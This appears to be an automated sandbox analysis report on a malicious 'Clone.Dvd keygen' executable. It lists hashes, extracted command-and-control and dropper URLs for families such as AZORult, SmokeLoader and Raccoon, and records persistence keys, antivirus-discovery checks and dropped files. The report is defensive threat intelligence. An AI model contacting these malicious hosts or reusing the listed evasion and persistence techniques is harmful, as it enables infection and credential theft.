azorult | 1d8b80677ca7dfc091296e422721910401ea5d3b63fe3892580b5c4d6579be6f

Analysis

max time kernel
51s
max time network
350s
platform
windows10_x64
resource
win10v20201028
submitted
26-03-2021 23:27

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Clone.Dvd.2.9.1.0.keygen.exe
Size

4.8MB
MD5

98e0552e7c661d3f84c5ca691bb58b60
SHA1

f8747cbd9256e9587e45b1feeded6b082b098e5d
SHA256

23e30d6f1d505e6a0cf1672ec7420d28af81975a9832f1af2eae8a3233a09eb4
SHA512

d767b09e6d24ce96ce95e7cbcb248b93373f7dcbad3a96ba249a3c54df9511567c4ff2bfd8393492a0f90ae8bf5ab37c1cf71f75092ad81dde7a7a7a5f7e76da

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

icedid

shturmann.space

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

smokeloader

Version

2020

http://xsss99.icu/upload/

http://bingooodsg.icu/upload/

http://junntd.xyz/upload/

http://ginessa11.xyz/upload/

http://overplayninsx.xyz/upload/

http://bananinze.com/upload/

http://daunimlas.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

dd478ff8ed48e4864892644c2a5502e502f6869c

Attributes

url4cnc
https://telete.in/iodmarius

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral3/memory/5420-346-0x00000000023C0000-0x0000000002CCA000-memory.dmp	family_glupteba
behavioral3/memory/5420-347-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral3/memory/5420-348-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

IcedID First Stage Loader 1 IoCs

loader

Processes:

resource	yara_rule
behavioral3/memory/3744-413-0x0000000002B20000-0x0000000002B27000-memory.dmp	IcedidFirstLoader

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral3/memory/4516-93-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/4516-94-0x00000001402CA898-mapping.dmp	xmrig
behavioral3/memory/4516-96-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/4516-97-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

86 4516 msiexec.exe

flow	pid	process
86	4516	msiexec.exe

Executes dropped EXE 33 IoCs

Processes:

keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exemultitimer.exesetups.exeaskinstall20.exesetups.tmpmultitimer.exemultitimer.exefile.exeIBInstaller_97039.exemd2_2efs.exex1fachb2j4i.exex1fachb2j4i.tmpSetup3310.exevict.exeelnhdiu5qnm.exeAwesomePoolU1.exeSetup3310.tmpvict.tmp5p0hooqkyn3.exeIBInstaller_97039.tmpicmnqirhger.exechrome_proxy.exeapp.exevpn.exevpn.tmpwinlthsth.exewinhost.exe

pid	process
3492	keygen-pr.exe
4060	keygen-step-1.exe
3504	keygen-step-3.exe
4428	keygen-step-4.exe
1400	key.exe
1616	Setup.exe
4668	multitimer.exe
4664	setups.exe
2360	askinstall20.exe
216	setups.tmp
1216	multitimer.exe
2056	multitimer.exe
532	file.exe
2424	IBInstaller_97039.exe
5052	md2_2efs.exe
1572	x1fachb2j4i.exe
4660	x1fachb2j4i.tmp
3004	Setup3310.exe
4608	vict.exe
4632	elnhdiu5qnm.exe
2644	AwesomePoolU1.exe
1012	Setup3310.tmp
2424	IBInstaller_97039.exe
1296	vict.tmp
4240	5p0hooqkyn3.exe
2332	IBInstaller_97039.tmp
5264	icmnqirhger.exe
5408	chrome_proxy.exe
5448	app.exe
5508	vpn.exe
5620	vpn.tmp
5816	winlthsth.exe
6100	winhost.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

setups.tmp

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 21 IoCs

Processes:

setups.tmpx1fachb2j4i.tmpSetup3310.tmpvict.tmpIBInstaller_97039.tmpicmnqirhger.exevpn.tmp

pid	process
216	setups.tmp
216	setups.tmp
216	setups.tmp
216	setups.tmp
216	setups.tmp
216	setups.tmp
216	setups.tmp
4660	x1fachb2j4i.tmp
1012	Setup3310.tmp
1012	Setup3310.tmp
1296	vict.tmp
2332	IBInstaller_97039.tmp
5264	icmnqirhger.exe
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

6616 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
6616	icacls.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral3/memory/5924-340-0x0000000000400000-0x0000000000FE1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

multitimer.exeIBInstaller_97039.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bh5sme0we0b = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\C53SZAZ7IT\\multitimer.exe\" 1 3.1616801265.605e6df1e2929"	multitimer.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	IBInstaller_97039.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	IBInstaller_97039.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md2_2efs.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
507	api.2ip.ua
116	ipinfo.io
120	ipinfo.io
152	ip-api.com
218	checkip.amazonaws.com
413	ipinfo.io
418	ipinfo.io
506	api.2ip.ua
546	api.2ip.ua
147	checkip.amazonaws.com
252	ip-api.com
411	ipinfo.io
440	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

IBInstaller_97039.exe

description	pid	process	target process
PID 2424 set thread context of 1388	2424	IBInstaller_97039.exe	msiexec.exe
PID 2424 set thread context of 4516	2424	IBInstaller_97039.exe	msiexec.exe

Drops file in Program Files directory 64 IoCs

Processes:

vpn.tmpx1fachb2j4i.tmpvict.tmpIBInstaller_97039.tmp

description	ioc	process
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-UA8IC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PTJ8S.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-IKRKR.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CNDBI.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-DMG1O.tmp	x1fachb2j4i.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-Q688K.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-4UI8N.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-R4ANE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-SSA4U.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-N18M3.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-I1NOM.tmp	x1fachb2j4i.tmp
File created	C:\Program Files (x86)\MaskVPN\is-N8U3S.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-1KDJ6.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-9927O.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-LQ86D.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-3TM4K.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-MF0JK.tmp	x1fachb2j4i.tmp
File created	C:\Program Files (x86)\MaskVPN\is-AUJH0.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-COEG6.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-ICPHL.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-P4LR5.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\am805.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Web.Extensions.Design.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-F25VI.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-1A0PC.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-DCC4P.tmp	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-4QCQU.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-73BG6.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-QDN9U.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-DMA01.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\jxpiinstall.exe	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-T7NSR.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\is-4B03I.tmp	x1fachb2j4i.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-05BEF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-U92QP.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-Q6VN5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6DN37.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe	x1fachb2j4i.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2400A.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q7OS3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-48AI8.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CVCKS.tmp	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-CSP16.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\viewerise\WeriseTweaker.exe	x1fachb2j4i.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-HV014.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	x1fachb2j4i.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exemultitimer.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

5552 5816 WerFault.exe winlthsth.exe
4876 6312 WerFault.exe b9706c20.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

7992 schtasks.exe
8236 schtasks.exe
7640 schtasks.exe
6560 schtasks.exe
7048 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

232 timeout.exe
7272 timeout.exe
8100 timeout.exe
6576 timeout.exe
5688 timeout.exe
9384 timeout.exe

pid	pid_target	process	target process
5552	5816	WerFault.exe	winlthsth.exe
4876	6312	WerFault.exe	b9706c20.exe

pid	process
7992	schtasks.exe
8236	schtasks.exe
7640	schtasks.exe
6560	schtasks.exe
7048	schtasks.exe

pid	process
232	timeout.exe
7272	timeout.exe
8100	timeout.exe
6576	timeout.exe
5688	timeout.exe
9384	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 280 Go-http-client/1.1
HTTP User-Agent header 281 Go-http-client/1.1
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

9032 taskkill.exe
8560 taskkill.exe
748 taskkill.exe
5276 taskkill.exe
5640 taskkill.exe
6520 taskkill.exe
8276 taskkill.exe

description	flow	ioc
HTTP User-Agent header	280	Go-http-client/1.1
HTTP User-Agent header	281	Go-http-client/1.1

pid	process
9032	taskkill.exe
8560	taskkill.exe
748	taskkill.exe
5276	taskkill.exe
5640	taskkill.exe
6520	taskkill.exe
8276	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exereg.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{406CABF2-39D3-4673-8273-07F8ECD6C1D6} = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000fcf9ba48cea050be4eb85812c14d158384f9d00842b27954fb53dc6cd10ace3b45121c28f5777833d0d27fcd5d6a01600c41be039e0f4e97315d	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "g3jtlhn"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{5F14B607-87F4-44C6-B484-C6733E86847C}"	MicrosoftEdge.exe
